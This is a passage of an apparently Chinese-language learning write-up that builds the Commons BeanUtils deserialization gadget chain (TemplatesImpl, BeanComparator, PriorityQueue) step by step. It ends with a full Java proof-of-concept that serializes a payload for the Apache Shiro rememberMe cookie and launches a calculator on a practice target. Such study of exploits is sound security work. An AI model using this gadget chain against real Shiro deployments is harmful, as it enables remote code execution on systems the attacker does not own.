import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.PropertyUtils;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Test {
public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, IOException {
PersonBean personBean = new PersonBean("Y4y17",22);
// System.out.println(PropertyUtils.getProperty(personBean,"age"));
// System.out.println(PropertyUtils.getProperty(personBean,"name"));
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
byte[] code = Files.readAllBytes(Paths.get("exec.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
PropertyUtils.getProperty(templates,"outputProperties");
}
}
这里需要设置一下_tfactory变量的参数值,以免报空指针错误。
data:image/s3,"s3://crabby-images/29805/29805771e4bdd7e66155890ce6d0baa3887edd10" alt=""
这便可以成功的执行代码了!继续往上找,因为我们需要进行序列化!我们接下来就看看谁调用getProperty方法:
data:image/s3,"s3://crabby-images/e59c2/e59c26e5b0cbd8b59766693dee7ea27cbf3df9d7" alt=""
这里搜索到的调用点并不是很多,挨个看一下,刚好第一个调用如下:
data:image/s3,"s3://crabby-images/3f324/3f3247664fb65f17da25ee720d637ef262256864" alt=""
在BeanComparator类中的compare方法中恰好调用了getProperty方法!
public int compare( Object o1, Object o2 ) {
if ( property == null ) {
// compare the actual objects
return comparator.compare( o1, o2 );
}
try {
Object value1 = PropertyUtils.getProperty( o1, property );
Object value2 = PropertyUtils.getProperty( o2, property );
return comparator.compare( value1, value2 );
}
catch ( IllegalAccessException iae ) {
throw new RuntimeException( "IllegalAccessException: " + iae.toString() );
}
catch ( InvocationTargetException ite ) {
throw new RuntimeException( "InvocationTargetException: " + ite.toString() );
}
catch ( NoSuchMethodException nsme ) {
throw new RuntimeException( "NoSuchMethodException: " + nsme.toString() );
}
}
这里的o1 o2都是可控的!同时看一下构造器:
data:image/s3,"s3://crabby-images/e2fb9/e2fb98a77699881fd3b320149c1060c0eae9bae1" alt=""
data:image/s3,"s3://crabby-images/be398/be39804de25124aad2433b6be23d985a11bb7e94" alt=""
property也是可控的!
所以我们就可以尝试先继续完善代码:
package org.y4y17.javaBean;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.beanutils.BeanToPropertyValueTransformer;
import org.apache.commons.beanutils.PropertyUtils;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Test {
public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, IOException {
// PersonBean personBean = new PersonBean("Y4y17",22);
// System.out.println(PropertyUtils.getProperty(personBean,"age"));
// System.out.println(PropertyUtils.getProperty(personBean,"name"));
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
byte[] code = Files.readAllBytes(Paths.get("exec.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
BeanComparator beanComparator = new BeanComparator("outputProperties");
beanComparator.compare(templates,null);
}
}
这样还是可以正常的执行代码的!
data:image/s3,"s3://crabby-images/422a4/422a4871ad14f73070bae6c9f2213e90a4425bf8" alt=""
继续找compare!(其实没继续往下看,就是因为当时在学cc链的时候,就有一个调用compare的地方!)当时是在cc4里面的优先队列中的存在着调用!
🦄 回顾 优先队列
在PriorityQueue类中的readObject方法中,曾调用了heapify方法
data:image/s3,"s3://crabby-images/b436e/b436ea363affbf6a2c16f1d48201177523da7f00" alt=""
继续跟进到heapify()方法:
data:image/s3,"s3://crabby-images/23e5f/23e5f7a0ca4399d58da35f0c6ec9edb2fc08cada" alt=""
继续跟进到siftDown方法:
data:image/s3,"s3://crabby-images/e6661/e66610f5183f8c19b5b26500acb16a72a45cd5ea" alt=""
在跟进到siftDownUsingComparator方法中:
data:image/s3,"s3://crabby-images/07d1a/07d1a731c452d2d71a2fed417dce372003f83904" alt=""
这里便看到了存在着compare方法的调用!到这里的话也就和上面的链子有链接起来了!comparator变量的值就是BearComparator对象!
所以我们可以直接创建一个优先队列,将其序列化和反序列化,来执行代码。这里通过第二个if里面的comparator.compare()
方法来调用到BearComparator对象中的compare()
方法!
同时还需要注意的是size的参数值不能是1或者0。因为他要右移1位。反射修改一下即可,队列里面存templates
。
最终poc:
package org.y4y17.javaBean;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.beanutils.BeanToPropertyValueTransformer;
import org.apache.commons.beanutils.PropertyUtils;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
public class Test {
public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, IOException, ClassNotFoundException {
// PersonBean personBean = new PersonBean("Y4y17",22);
// System.out.println(PropertyUtils.getProperty(personBean,"age"));
// System.out.println(PropertyUtils.getProperty(personBean,"name"));
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
byte[] code = Files.readAllBytes(Paths.get("exec2.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
BeanComparator beanComparator = new BeanComparator("outputProperties");
// beanComparator.compare(templates,null);
PriorityQueue priorityQueue = new PriorityQueue(beanComparator);
priorityQueue.add(templates);
Class<? extends PriorityQueue> aClass = priorityQueue.getClass();
Field sizeFiled = aClass.getDeclaredField("size");
sizeFiled.setAccessible(true);
sizeFiled.set(priorityQueue,2);
serialization(priorityQueue);
// deserialization();
}
public static void serialization(Object o) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("shiro_cb.bin"));
objectOutputStream.writeObject(o);
objectOutputStream.close();
}
public static void deserialization() throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("shiro_cb.bin"));
objectInputStream.readObject();
objectInputStream.close();
}
}
最后生成exp:
data:image/s3,"s3://crabby-images/30526/3052690d7e708a3ff160bf6cd876b80107f1253f" alt=""
替换rememberme:
data:image/s3,"s3://crabby-images/d40e9/d40e9e875103327c4bd596f31328cbfecdbf1498" alt=""
执行之后,也是成功的使得靶机弹出计算器!
data:image/s3,"s3://crabby-images/aac13/aac13596730ab111a4873e95bbdb3431cded691a" alt=""